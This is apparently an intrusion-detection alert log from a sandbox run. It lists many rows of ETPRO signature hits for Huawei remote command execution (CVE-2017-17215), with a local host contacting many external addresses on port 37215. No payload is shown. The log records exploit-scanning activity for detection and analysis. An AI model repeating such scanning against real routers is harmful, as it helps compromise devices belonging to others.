                                                        06/13/24-21:32:03.309488TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5059837215192.168.2.1441.131.180.209
                                                        06/13/24-21:32:48.556134TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5579437215192.168.2.14156.156.80.209
                                                        06/13/24-21:32:17.670885TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5537237215192.168.2.14197.193.74.54
                                                        06/13/24-21:32:19.751821TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4204237215192.168.2.14156.66.140.31
                                                        06/13/24-21:32:38.317561TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4571837215192.168.2.14156.83.33.230
                                                        06/13/24-21:33:13.229428TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4866237215192.168.2.14156.134.88.120
                                                        06/13/24-21:33:07.056955TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3847437215192.168.2.1441.188.129.59
                                                        06/13/24-21:33:09.090485TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3682837215192.168.2.14197.24.54.153
                                                        06/13/24-21:32:17.697176TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4325637215192.168.2.14197.211.188.147
                                                        06/13/24-21:32:03.297098TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6021637215192.168.2.1441.191.40.211
                                                        06/13/24-21:33:05.013336TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4190837215192.168.2.14197.64.187.20
                                                        06/13/24-21:33:00.889765TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5907437215192.168.2.14156.79.64.16
                                                        06/13/24-21:32:40.376202TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3689237215192.168.2.1441.233.126.192
                                                        06/13/24-21:32:17.695969TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3862437215192.168.2.14197.22.40.159
                                                        06/13/24-21:33:17.307978TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4479237215192.168.2.14197.174.220.51
                                                        06/13/24-21:31:57.090611TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5193837215192.168.2.14156.67.239.183
                                                        06/13/24-21:33:09.086360TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4885637215192.168.2.1441.216.94.153
                                                        06/13/24-21:31:57.092508TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5230637215192.168.2.1441.46.183.102
                                                        06/13/24-21:32:58.821763TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4276837215192.168.2.14156.204.126.118
                                                        06/13/24-21:32:28.025481TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4443837215192.168.2.14197.202.176.171
                                                        06/13/24-21:32:42.408523TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5067437215192.168.2.1441.38.9.120
                                                        06/13/24-21:32:09.458807TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3798437215192.168.2.14197.89.81.249
                                                        06/13/24-21:33:09.112220TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5104437215192.168.2.14156.59.208.48
                                                        06/13/24-21:31:59.175109TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5835637215192.168.2.14197.156.227.155
                                                        06/13/24-21:32:58.838778TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3968637215192.168.2.14156.225.183.236
                                                        06/13/24-21:32:32.168160TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5398837215192.168.2.14197.30.98.49
                                                        06/13/24-21:32:48.568941TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4356637215192.168.2.1441.227.233.210
                                                        06/13/24-21:32:52.658149TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4981237215192.168.2.14156.26.113.202
                                                        06/13/24-21:32:19.728856TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3893837215192.168.2.14197.175.125.91
                                                        06/13/24-21:32:46.504021TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6006237215192.168.2.14197.240.174.186
                                                        06/13/24-21:32:23.929762TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4765237215192.168.2.14197.176.217.197
                                                        06/13/24-21:33:17.305079TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3726437215192.168.2.14156.64.24.122
                                                        06/13/24-21:31:57.136223TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5501437215192.168.2.14156.203.51.107
                                                        06/13/24-21:32:48.551216TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5888837215192.168.2.14197.207.120.170
                                                        06/13/24-21:32:34.193595TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4943637215192.168.2.1441.23.35.44
                                                        06/13/24-21:31:57.091789TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3769637215192.168.2.1441.194.169.6
                                                        06/13/24-21:32:44.454905TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5202237215192.168.2.14197.185.139.247
                                                        06/13/24-21:32:36.243018TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4690637215192.168.2.1441.79.31.127
                                                        06/13/24-21:32:50.629115TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5031637215192.168.2.14156.55.251.26
                                                        06/13/24-21:32:09.436921TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4294837215192.168.2.14197.71.185.52
                                                        06/13/24-21:32:17.694930TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5903837215192.168.2.1441.63.253.240
                                                        06/13/24-21:32:54.707731TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4131837215192.168.2.1441.213.252.217
                                                        06/13/24-21:32:13.567220TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3429837215192.168.2.14197.242.229.124
                                                        06/13/24-21:33:02.914524TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6022837215192.168.2.1441.178.141.86
                                                        06/13/24-21:31:57.131314TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5940237215192.168.2.1441.189.207.71
                                                        06/13/24-21:32:15.611145TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5384237215192.168.2.14156.232.89.123
                                                        06/13/24-21:32:09.458377TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4189837215192.168.2.14156.23.44.159
                                                        06/13/24-21:32:38.300210TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4351037215192.168.2.1441.108.100.59
                                                        06/13/24-21:32:40.355145TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4193237215192.168.2.1441.139.132.20
                                                        06/13/24-21:32:34.198861TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4944037215192.168.2.14156.136.100.192
                                                        06/13/24-21:32:36.263933TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5080037215192.168.2.14197.29.252.192
                                                        06/13/24-21:33:05.010933TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4791637215192.168.2.14197.197.223.16
                                                        06/13/24-21:32:23.937058TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4705237215192.168.2.14156.110.139.64
                                                        06/13/24-21:33:00.869864TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5875637215192.168.2.14156.152.119.253
                                                        06/13/24-21:32:28.042558TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5385037215192.168.2.1441.213.132.198
                                                        06/13/24-21:32:56.754202TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3603437215192.168.2.14156.77.255.136
                                                        06/13/24-21:32:54.725452TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6061637215192.168.2.14197.59.162.40
                                                        06/13/24-21:33:00.868875TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3746637215192.168.2.14156.30.151.222
                                                        06/13/24-21:32:56.784937TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4113637215192.168.2.14197.201.34.11
                                                        06/13/24-21:32:52.657672TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5338037215192.168.2.14156.212.237.11
                                                        06/13/24-21:32:07.419838TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3849637215192.168.2.1441.175.40.121
                                                        06/13/24-21:32:34.218296TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4714637215192.168.2.14197.113.196.227
                                                        06/13/24-21:33:13.231157TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5630637215192.168.2.14197.61.140.181
                                                        06/13/24-21:33:07.042390TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4965237215192.168.2.1441.122.35.121
                                                        06/13/24-21:33:15.275819TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5591437215192.168.2.14197.62.190.199
                                                        06/13/24-21:32:11.486335TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4794037215192.168.2.14156.116.69.173
                                                        06/13/24-21:32:38.318448TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4996237215192.168.2.14156.76.13.208
                                                        06/13/24-21:33:02.913494TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3633237215192.168.2.14156.220.87.119
                                                        06/13/24-21:32:38.319867TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5114237215192.168.2.14197.189.17.204
                                                        06/13/24-21:32:36.268756TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3323437215192.168.2.1441.52.233.105
                                                        06/13/24-21:33:09.107914TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3294237215192.168.2.14197.233.214.191
                                                        06/13/24-21:31:59.174184TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5832837215192.168.2.14197.25.6.232
                                                        06/13/24-21:33:02.912396TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5099037215192.168.2.14197.70.58.77
                                                        06/13/24-21:32:36.242831TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4723637215192.168.2.14156.20.221.19
                                                        06/13/24-21:32:15.609210TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5505837215192.168.2.1441.241.135.136
                                                        06/13/24-21:32:58.821704TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4025237215192.168.2.14156.120.169.236
                                                        06/13/24-21:32:01.241405TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4335437215192.168.2.14197.33.119.29
                                                        06/13/24-21:32:42.421389TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4552037215192.168.2.14156.94.60.177
                                                        06/13/24-21:32:52.677895TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3363837215192.168.2.1441.160.240.80
                                                        06/13/24-21:32:44.477000TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5834437215192.168.2.1441.106.160.150
                                                        06/13/24-21:32:15.635957TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5767237215192.168.2.14156.238.32.230
                                                        06/13/24-21:33:09.127874TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3336637215192.168.2.14156.189.237.47
                                                        06/13/24-21:32:13.546953TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3517437215192.168.2.1441.80.229.70
                                                        06/13/24-21:32:42.408705TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4436237215192.168.2.14197.230.9.227
                                                        06/13/24-21:32:42.421526TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5639837215192.168.2.1441.39.177.64
                                                        06/13/24-21:32:11.485677TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3377437215192.168.2.1441.105.136.152
                                                        06/13/24-21:33:17.306651TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3299437215192.168.2.14197.249.225.202
                                                        06/13/24-21:32:07.417104TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5314837215192.168.2.14197.228.41.168
                                                        06/13/24-21:32:11.509046TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4538637215192.168.2.1441.238.165.73
                                                        06/13/24-21:32:38.300615TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5716837215192.168.2.1441.50.81.114
                                                        06/13/24-21:31:57.131636TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3393437215192.168.2.14156.14.1.85
                                                        06/13/24-21:32:46.524785TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5675637215192.168.2.14156.111.125.206
                                                        06/13/24-21:33:13.228697TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4392437215192.168.2.14156.47.97.185
                                                        06/13/24-21:32:38.303466TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5852437215192.168.2.14156.124.107.14
                                                        06/13/24-21:31:59.177063TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3974037215192.168.2.1441.31.170.60
                                                        06/13/24-21:33:11.156204TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4966237215192.168.2.14197.41.90.163
                                                        06/13/24-21:32:03.308456TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4449037215192.168.2.14156.180.29.62
                                                        06/13/24-21:33:02.909680TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4754837215192.168.2.14197.36.169.254
                                                        06/13/24-21:33:13.214104TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4685837215192.168.2.14197.167.146.121
                                                        06/13/24-21:32:46.527965TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3775837215192.168.2.14156.51.88.235
                                                        06/13/24-21:32:19.728076TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4123437215192.168.2.14156.106.134.134
                                                        06/13/24-21:32:05.371069TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4464037215192.168.2.14197.158.117.58
                                                        06/13/24-21:32:13.545369TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3647437215192.168.2.14156.213.179.37
                                                        06/13/24-21:33:09.109550TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5177637215192.168.2.1441.42.66.250
                                                        06/13/24-21:32:42.409002TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3582637215192.168.2.14197.193.203.35
                                                        06/13/24-21:32:30.077880TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3982437215192.168.2.14197.93.246.137
                                                        06/13/24-21:32:32.153711TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5756837215192.168.2.14197.30.149.170
                                                        06/13/24-21:32:34.193636TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3598837215192.168.2.1441.61.89.74
                                                        06/13/24-21:32:40.375351TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5277837215192.168.2.14197.240.196.104
                                                        06/13/24-21:32:34.193876TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4183437215192.168.2.14197.91.185.227
                                                        06/13/24-21:32:38.320541TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3739437215192.168.2.1441.97.129.66
                                                        06/13/24-21:32:50.614353TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5731637215192.168.2.1441.237.219.207
                                                        06/13/24-21:32:28.044702TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3795637215192.168.2.14197.170.107.4
                                                        06/13/24-21:32:13.545597TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4704637215192.168.2.14197.133.236.111
                                                        06/13/24-21:32:01.225072TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3756637215192.168.2.14156.136.120.179
                                                        06/13/24-21:32:03.277676TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4114037215192.168.2.14156.13.239.178
                                                        06/13/24-21:32:13.546039TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5818837215192.168.2.14156.75.40.150
                                                        06/13/24-21:32:38.305472TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5120037215192.168.2.14156.86.112.47
                                                        06/13/24-21:32:07.403109TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5310037215192.168.2.14197.32.90.123
                                                        06/13/24-21:32:25.976007TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3871837215192.168.2.14156.15.109.165
                                                        06/13/24-21:32:11.506447TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4193637215192.168.2.14197.211.168.205
                                                        06/13/24-21:32:56.784274TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5148037215192.168.2.1441.125.105.89
                                                        06/13/24-21:32:52.660111TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5995837215192.168.2.1441.238.96.36
                                                        06/13/24-21:32:50.610575TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4011837215192.168.2.14156.183.247.73
                                                        06/13/24-21:32:56.755673TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5809837215192.168.2.14197.112.209.236
                                                        06/13/24-21:32:52.669217TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6013437215192.168.2.14156.63.171.199
                                                        06/13/24-21:32:01.248042TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5907037215192.168.2.14197.180.69.92
                                                        06/13/24-21:31:57.137533TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4211637215192.168.2.1441.107.23.150
                                                        06/13/24-21:32:38.316666TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5058237215192.168.2.14156.233.66.159
                                                        06/13/24-21:32:19.730607TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5410837215192.168.2.14156.43.199.46
                                                        06/13/24-21:32:56.759307TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5876437215192.168.2.14197.174.186.164
                                                        06/13/24-21:32:23.941862TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5856437215192.168.2.14156.60.166.12
                                                        06/13/24-21:32:38.303209TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5216637215192.168.2.14197.123.194.145
                                                        06/13/24-21:32:01.246808TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3291837215192.168.2.14197.193.152.214
                                                        06/13/24-21:32:11.488018TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4369437215192.168.2.1441.138.87.41
                                                        06/13/24-21:32:50.618109TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3643237215192.168.2.1441.211.172.83
                                                        06/13/24-21:33:00.868686TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4889437215192.168.2.14197.237.4.213
                                                        06/13/24-21:32:21.786736TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3671437215192.168.2.14156.54.218.230
                                                        06/13/24-21:32:17.674487TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4883637215192.168.2.1441.146.4.239
                                                        06/13/24-21:32:03.277418TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4970637215192.168.2.14156.15.119.11
                                                        06/13/24-21:32:11.488456TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5885237215192.168.2.14197.49.237.247
                                                        06/13/24-21:32:46.528314TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5183637215192.168.2.1441.132.80.65
                                                        06/13/24-21:32:03.275546TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4742237215192.168.2.14197.44.145.47
                                                        06/13/24-21:32:44.477478TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6001437215192.168.2.14197.47.65.14
                                                        06/13/24-21:31:59.175867TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4230637215192.168.2.14197.222.41.238
                                                        06/13/24-21:32:23.942517TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3817637215192.168.2.1441.168.203.37
                                                        06/13/24-21:33:11.159660TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4562437215192.168.2.14156.46.109.173
                                                        06/13/24-21:32:05.347840TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5050837215192.168.2.1441.234.198.2
                                                        06/13/24-21:33:07.057850TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5474437215192.168.2.14197.213.152.247
                                                        06/13/24-21:32:05.368781TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5874037215192.168.2.14156.83.54.151
                                                        06/13/24-21:32:34.218011TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5858637215192.168.2.14156.254.228.100
                                                        06/13/24-21:32:05.377989TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5531237215192.168.2.14197.120.114.90
                                                        06/13/24-21:32:34.193731TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3427637215192.168.2.14197.207.199.148
                                                        06/13/24-21:32:40.353473TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5526637215192.168.2.1441.59.249.77
                                                        06/13/24-21:31:59.197165TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3438837215192.168.2.1441.8.46.108
                                                        06/13/24-21:32:34.194458TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4872437215192.168.2.14156.192.239.174
                                                        06/13/24-21:32:54.711597TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3625037215192.168.2.14156.156.55.190
                                                        06/13/24-21:32:01.241021TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5779437215192.168.2.14197.51.147.125
                                                        06/13/24-21:32:40.377404TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4182837215192.168.2.14156.186.71.138
                                                        06/13/24-21:32:03.305300TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5492237215192.168.2.1441.52.60.11
                                                        06/13/24-21:32:03.309463TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5273237215192.168.2.14197.144.121.147
                                                        06/13/24-21:32:09.457470TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5666037215192.168.2.1441.206.150.87
                                                        06/13/24-21:32:34.192235TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5046437215192.168.2.14156.194.163.116
                                                        06/13/24-21:32:28.044732TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6051037215192.168.2.14156.133.103.180
                                                        06/13/24-21:32:48.567605TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4550837215192.168.2.1441.93.136.231
                                                        06/13/24-21:32:19.730983TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3729837215192.168.2.1441.183.181.82
                                                        06/13/24-21:32:03.308103TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3316437215192.168.2.1441.245.102.93
                                                        06/13/24-21:32:46.502991TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5718837215192.168.2.14156.169.166.164
                                                        06/13/24-21:32:17.697536TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6048837215192.168.2.1441.198.25.42
                                                        06/13/24-21:32:52.670020TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4800237215192.168.2.14156.162.115.41
                                                        06/13/24-21:32:44.480745TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4140437215192.168.2.1441.143.239.203
                                                        06/13/24-21:32:23.833894TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5616437215192.168.2.1441.223.20.15
                                                        06/13/24-21:32:05.345802TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3644437215192.168.2.14197.10.129.158
                                                        06/13/24-21:32:56.785058TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3500437215192.168.2.14156.133.66.157
                                                        06/13/24-21:33:15.275208TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3925637215192.168.2.14156.186.22.5
                                                        06/13/24-21:32:46.503530TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5336437215192.168.2.14156.38.166.199
                                                        06/13/24-21:32:44.477929TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4240037215192.168.2.14197.12.1.203
                                                        06/13/24-21:31:57.092859TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5259637215192.168.2.1441.92.140.216
                                                        06/13/24-21:32:44.476571TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4090437215192.168.2.1441.35.245.202
                                                        06/13/24-21:32:56.784999TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5620637215192.168.2.14197.222.108.6
                                                        06/13/24-21:33:02.912155TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5409637215192.168.2.14156.212.51.229
                                                        06/13/24-21:32:30.096724TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4715637215192.168.2.1441.170.111.7
                                                        06/13/24-21:31:57.137854TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5867237215192.168.2.1441.198.13.88
                                                        06/13/24-21:32:09.437830TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4304837215192.168.2.14197.12.194.111
                                                        06/13/24-21:32:09.458108TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3740037215192.168.2.1441.207.111.131
                                                        06/13/24-21:32:38.322805TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3760437215192.168.2.14156.3.64.73
